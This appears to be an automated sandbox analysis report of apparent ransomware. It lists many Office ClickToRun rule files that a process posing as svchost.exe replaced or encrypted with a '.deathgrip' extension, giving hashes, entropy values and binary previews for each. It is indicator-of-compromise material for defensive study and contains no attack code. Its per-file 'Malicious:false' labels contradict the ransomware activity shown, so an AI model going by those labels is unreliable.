                                                          Preview:........H..(.0]..!...e._c$&I....PY..t.y....sAT&../..W.87p.C+!=...V..;F=.?o..j..(...0.R.w........l.....(.M...L? ....[O..KR........$R...?..U'V...2f....f..3.|....uX*..&...z.~......\$mU.uI+X..4.!..?&.6l'...usQ@.$.m9C...X..|UYlm..Rp.\....i..Z8f....C.....wg.S....EV1.a.5..K.......P.f....W..7p...BL.6.5.........YY..C....#.t......=.7.f,.....B.N7..8N....._l..x\y... .....CD0.yF.qi.\o........c._,....j..Z4.0f..rPCw....U..f]..d+.P.f..VT.g7Y. ..&..p.k..J.)5.k....r..k.....Cb$..1..GC..U.........L...UN..R_a9...R..P.>.A.."./oa.....``....QMG..7n.>...y..h...w..I...d..?..gE.,S..4.=....u..Q..-..@1<a%.).ih..#..._.@...Sz.%N..;2.}4..i.w...4P.D..D.p..b.y.....k@py..>.]....;.3~.4.ho...z.....JY...t.....2..Hk0....MN..._-t..u.M(...i......p.p6..}........-2i=........a48!...<.@....?...=..$.X.......M*..P!.l..G...&.....w..@...P....V..$......f..@.jC...\.zK.!-.U..G%B......f.*...j2..._........fq........^E..mc.k..F4Y.#&..........]..Ji....t..8.1.@....&$#....r......+x.S.&*..{I....Q

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701150v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701150v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):7.822658151018265
                                                          Encrypted:false
                                                          SSDEEP:48:mcuhNK7sMn4yyisW5AoMm4Ms4e21pF6JbcaF:8N4Pn4RcAoMmt97zF54
                                                          MD5:947248C4AE30D3B70F3D1B84B64AAA20
                                                          SHA1:DC3A65E7AB5400015BCE1487DD52E8D7F17CE2C7
                                                          SHA-256:A5BE7006BCFD13A5941494461688803B3F5D9499A6826BD29F9CC2E74E38B679
                                                          SHA-512:EE1F658545F62C6FC69FED79C2DDF73175558E41CBA44AC9873809380A655BB08EC13031DA461CD834AC40FA5DFA88559CF1C2B8A9ACEC0930708AF435C12A76
                                                          Malicious:false
                                                          Preview:............2..<..`n..P.Eu.:U....n..&.mC.$>[.J(.x|.UPc......t..U^.>.,...(.%.3.A^..B#.5..`u.Ah.^.X...].._=~.T..8<...`...1.ZV.e.5G.F.;....nr.....U.......@....3.P.....j..P.ajp.V8g.6gl.....5~....p.......O..<.o.<..... ...J.,.CH7.`.R..r.......a.D..&..*...T.xl7}..D.......y...9'1.} ..a...{.SP..g.........R..V..e...D."*t}U`%.T0..H9...h....Ie..D..x....._9(^.y.\.}....nX... ....:.M.j..t.Za.]b{..&G.{h......#...9..S.I.%0D..{.z.1l1..VR^...g.?M...9....j.......d..I.T......v?.s.E..........I..M. .;.U..i...._iY*F.V-.g..!..F...+..k.._OEw..r..j[...*.-._.Z...l..&...@.r.X....!..Y2q..<.I.i.*....s.E.7w`.mIN\I..u..ttv:..ny.T,.vw~.a..'J.\E..;S.w.W....E............_....Bu.|....E..F......_......W.\.W..uT 4.r\./.{e....?.P..I.*.9u....h.U!q....3..?w*...Q....T.R~.~B0..I....5.o ..6.j.(C=.N=...XYm....%......h.YP.*..{..d.."^$.U....t.Y..^g..XL.....(...ShI....1 =......2m...|G.C..&.:.....(.g.(C...X..s..N>.,-....K.0..{|.y..R.|...}.'...c<..E.F..l..#..~y.|. . .e....x.X.yvq......

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701151v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701151v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.8124094276530505
                                                          Encrypted:false
                                                          SSDEEP:48:sjlyr1dvxMRaycZEpHJFqBGAN8/EG4GCsnvagA:o41dvKwd8pFuGA8kGJG
                                                          MD5:31DF7C02F64EFE2F74890B71ED7D4B10
                                                          SHA1:78C74CFA81279DAAACE40028BAD27EDE6F4C7405
                                                          SHA-256:01EE961EEEB9F6F3195484D5D60258D1EDE5BC53A7781AC71FE5FD57F117A5F3
                                                          SHA-512:8F9B4737912A8747527E3F61FB3CEF02D5C61EE93E3F79A63468607BC914486EE4895F16F46A2C15E52A284E0D6B53EA318ABA898D17105E83235598B5ACBAB3
                                                          Malicious:false
                                                          Preview:.............>Ws.B..?.{..}......@.|...9.....e...v.....(.2{.....,.}:.n..ac...S.[zS..(ln..&q...\L..X_."N~!D.J.\kTfj.0..g./...G...xk....k.}..e.].6..6...[..C...$...o...og.5QY.9%!|b...K..J8Z.[.?{!..X._+...C...d.....xE%...(2.c.{:.q..8J.=....o..G.....6.f.g.'.N.....9..,.^...a;u.......w.K&&...../F.{.,........|u...U....\EgZJo.E..J....Qp.Nm..ku).>._........=NU$.P......../f.Rw.T.{Xu..o..%U..W....e..j+...X.$zz$C.........[s.8m+[.s~\$j.3.W..W...|.M..2aij....W..b.Z.\X.......2......}WuL..r.K&.P]0.a.%.....b.~....(*M.&-..*..<?f.......3..b......@.....S..l...Q...jT..=..u.d....J....=u. ...$.h... .?.!.............?^a..m...3-.,.;[.6....@o...G.Z..>c...G.Y.d=N.a.....m......!.R.......Zh......7^..]..."............"#.J..[Z.!.0.Ub...X......2!.a..M.D..{..]Z!3...=u?*]e.>.5.....D.w...=. w'.....6.k).a>.....Y.H(.....5.....K.I..c.0WV..r@,."wR.2.....52.......*B....R7ap..'...~.n.,.............t.).u.Uj+K.tAw7......Jjv........\^..x...|+ ....`.|?n..y...]5......),.....QU......

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701200v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701200v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1712
                                                          Entropy (8bit):7.814884831121784
                                                          Encrypted:false
                                                          SSDEEP:48:weJ645j1oe9vXDzyE2EBoukoX3Sc14m4ZZIQz:dJN2ehXDzB2EBoukoXR14vZiQz
                                                          MD5:3CBE33C20FDC6BE52C4F052C7A831028
                                                          SHA1:076AA68F13BEC82E93CC9F2E2D783707D497430C
                                                          SHA-256:154B025DBDEEC84786381C52CADF2AB13E01E2CFA7E4BE7D32FF329D40557865
                                                          SHA-512:B909C168B9627314F5F12E354C19CC2795B9ACF8F5E33908532DF419B1CB1510033AAA3CC2FAC93F3B99D79F14CF9AD3AFB55629F096027462EFE6C8DBB98F48
                                                          Malicious:false
                                                          Preview:........._.......:o& .:..../!...W..q.5.!..;.Wj.=...!...wc.&.[A.e.......w..~r+.B>a.b![.~.....;....8.|}....z..6..?#2FEs..w.. >.ZQ..LZ..+}..#....b8.f./gCAIhE}SZ2..a..."....^?......1....1S2........(.^....Y.+ch..C...<JR....7....p.....bP..8.5.,+{8..&..O.{I-.....1fBb...M....#.*E..p...b'.`r"s.[..2...d{......o.w.p...........'#|.B.13.*up....'9.....F..(..TU+,....M.j.3eG.R....<V..\Pd.f..W...Xu.H0...8(.....Z|Q=;.{.l.J..$P)......L.......K.|...v)...<1...Ml.u.7..a....LcC\C.C..s..MJ.P...b.S.....8..t.4.."...y.|......Bfov......u'.Q.&Ya.|u.?.7.p..#....Ae.;c.....)I.-.9.........y<R..dl..L...(..k=>..*.........w.R.h...D.2.k?.....}.U.v.u...N....]H..........!...P.Q...?....h.+.E' @.T..}D.5..{.d.(q..V.fQ=....?.Z.m.......P.?2....v..:>$...f].......C ..g.d..-z/>.u^}...;%(>Yd8%Q6:'.Y...J..Z.k/|..X....Pzb.!n..Y...%.p.w..0;.pe.....}..N.A..;%.7.-B...JuX...o.#..Y.EM..5 ....=.]...b........v.8....z.o.|....G. 9.v.r......Q..U*.....dD.G...P.a.....8...wD....CzY...}.(.....VJ"..n;0.-P..

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701201v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701201v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.8078171680073405
                                                          Encrypted:false
                                                          SSDEEP:24:UL+CnovnUM8SYST2qUu4tD+NVVqJrxUS/HId7JXFZWWgq8T73mi3gVdNQZdFJ5U6:rzvUM5b2vWVVyrq5JT8573pwQdFJ5JJ
                                                          MD5:A76F3CEB5EA2A8BA22E2FB18BD34D34D
                                                          SHA1:F4B3A1221BB287B70CC60463FE9F0CA382C5D635
                                                          SHA-256:8A61CBC399583F18D24E8AFFE2F7ADE83EEAC46963BB4CE66369148E413B7B42
                                                          SHA-512:352E2CD398FE7C6A3CFD41D3691CAC25EA057A8CA1F1DB2276D78145F8B1E0181C8F2DBF1981437E4CA13168A6000A4FFBCAB3D8BCACC43C13C4F8CB37E067E8
                                                          Malicious:false
                                                          Preview:........"..D..}.@C`F'.%.a..}.Q....T.1+k.+...N..&.~N.......wt...g..pi.j...Tg..S...s.P....4._.dT.._........^....B].......n..]D.'.QV..a.s.6y,.D.P..`....$....~.u=..{b>..Q....N^.].$JV`...IP.N..._g#...._.l....2.y.*.,.....I.c+:....b.)......Z}~rB2../:.Rr..G..N..X\1F.3...q.<UjPE....q.27.3.X3.'g.1.B.Q(..}.5..Y.C.,..|Z<n.d..].e.+H..'....=...........y8......?.d.Y.d..u....F0I.tDK.{}.........w..._..e...W.e.....4..^.o..(.h..(.Y.....;........J..8.o...g..<p.X`...G..6.6x.".B..A..%....Y4..8.;v[VTv.1..H..:z.\.dY.v..W..D.].=..F0`.....9*...l6F.z.Uq.'ch......p.....).G.......3..w.S.4.^r..C.........51;f..c..4.....5.SV.....`.`gR....&..-...........>bA..._..c../..%]se...Qu}X"../d5.*.#..Y.']...-.rh...;...~1.U.Y.&,.X..#].U.1...Z#...i.._ .!...+.-..2.D.I).....A ...@.k.6D...FhM...c...`O.b#vz.FS<`C.6...L.e7.^.0.u...{vx.B...O.|.u.:_UQDy..5j.J.bd...}.D...<...)-&.Vo...9h..]@<...f`......VT2.G.qX.S.....T)..8.M..~....gz...R.##.E.:X..N6..q....Y[..........ACV...%....x..\u.

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701250v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701250v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701251v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701251v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701300v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701300v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):7.808249336815543
                                                          Encrypted:false
                                                          SSDEEP:24:2Of5BxLhGi39dftcLcLjBgWfCzu8JTttoMc4Vs/jz4Curwhf2w0oZ7+WhmgXAMVS:Lf+9LcPN6zuYhqMcwdrOf2W7+uwP
                                                          MD5:686FAF80B5ABFC3340EC2ED376B7BBFF
                                                          SHA1:D8FDA59F8E082B504AF293FC8A9BB5B379F81D1A
                                                          SHA-256:D1D8810878DBE4CB6AE6B3DC9A4C92F4A7EC7870FF1476FB8DFCB83798A98CE2
                                                          SHA-512:B088B1BF362AA42FFC69EBE68663DCD19353E6FE5C4E575D85856F25E071E523BE2CA06FE845503A0F006318923CE53F99BAC6D6F977E4D7BBE1F60DC5C40966
                                                          Malicious:false
                                                          Preview:........Mg.W,......=N....#.0lS6..i..<......3ydwG{.O....O.3...........U.{9..E%.u...DD.%..+...q.>......1{..@O.?..~;......... .l.*M...2!(..M.@.!$pUzb-`...)%B.V.i.|..,..w......z....O......*g......0....+.`F..d....[8..v.Dy).x_..JU.I..ou.^R..F..d/0.....s..Z..'.a.........<.@...+"lD3...Z.c3l.D.~...G..8..Qo6.....).8.C.t.-..jA}Q._._]...to.:%.o..&../...x..+../f.W.G,.~RC..[..#.s..y+=qC@.....G../Y..s....<V.Y{...a..!..,WJO..&...iZX.sA....^.p..2r................3.h.H].;....tny._..J.^DweIJV.g..0!*...rI.aTRe.P....G...R.../w........i~...$i.........9M...y6./..Og(.n.tF.._n....1P.......sC.HuV7..g....P...s..yB.Y/\.J&r.s..".F=5....'.v..:&aCI...Ao......Y.x.. .".....$..3T"DD.v..?.Bo...F..%...d2.i..8s80...v..jO.b..N.%...<v..d$..?.%.<....x..y.\..{..Ic.m.*V..[b.......XC8../.x..>.T.......M....~t].....ca............$...x_.Z.CT...4.(=...g.G.f...j..s.....".Tx......Om.y@/...@.p....<.@..8.u.#\P...r^.r.z...p...A6E....../.vyI.jH..."..,ET...7&!..+.&.K..............y$.2..d,w.t.pm.X#.d

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701301v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701301v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701350v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701350v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701351v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701351v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.815196517289248
                                                          Encrypted:false
                                                          SSDEEP:48:OJPcd8G0CaQju0+0qFrg2SvwxM/4LcI2y3URBkX3:MU/G0A0Ig5vwq/ecIMBe3
                                                          MD5:848874F622DFE767822E628B63ECFBDD
                                                          SHA1:AB86A6B9A1BF446755CC6F8D868FAD91E3F97BA1
                                                          SHA-256:01886E407B27025D113775DAA7CE7C234C5F37E4236939515716179D5F83C227
                                                          SHA-512:E1865A215DADEA5119855A2290BFBE59F6EEDD6935B8958342B053155D7395BEE9F1D92468E4829F59B5B083F68740C4E3413E8738B0167FB828118015E130D2
                                                          Malicious:false
                                                          Preview:......../...........W.)%E"u.p.......,........w.#..r.?.$B..N.ol...2= b.P.cZy.......?v;v9...`e.@..x.....E.8......`]A......Dh3...K.1(."...u..Pm.49.....x4G%r9$;.?(,..p.=...C\..>.0.'.*1**...}k.!.X.....O.t....;..S.qP.:...M......@g.he.....I...g..h.e...'J....0~.... Q@.x........Tt8ca.g(.B....?.A.d.S.T$\...OA....~..{.Ij....[.gq..U.Pd.../nf......C..c}{..B.k=Q.i.V..Q../~.1b.L...1D..U.l.Z..n.O.@.D...[.D...}.+..y.:-..H..b..]\.V..+s..*....F...`.s.~.y..+uK...E.q.s....7....e..l9y:. P...VB.:.P.r.;...Z.2.6%.... ;....y]......U$C....t....x.*.p..pwv.d ...U..........5hTe.K.,s...7.....r.P../U...o.i.../..l.n.....R..W...6Z........u.j.M...*4J1.....X.....Et I$....35P..?..RCBdU?...?.h.3V.hG.yA.VX5.L._...gF#(6...........[.2C?..8.s.[_......n..e.....%..l.j.[+.S...n.+*Wu...e..N...C..S...Y.......nM.|7HY.k../.X.*.........{(|)....}....}.WR*.P9a.d...Y.....N...%.<.........G..S.;.....<..|-.Q.6....J..bnCH/O...AE.o..T..m..Un...N..fW.V......wK9....<..F...@.y...z.i. ......].gH..O

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701400v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701400v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701401v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701401v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
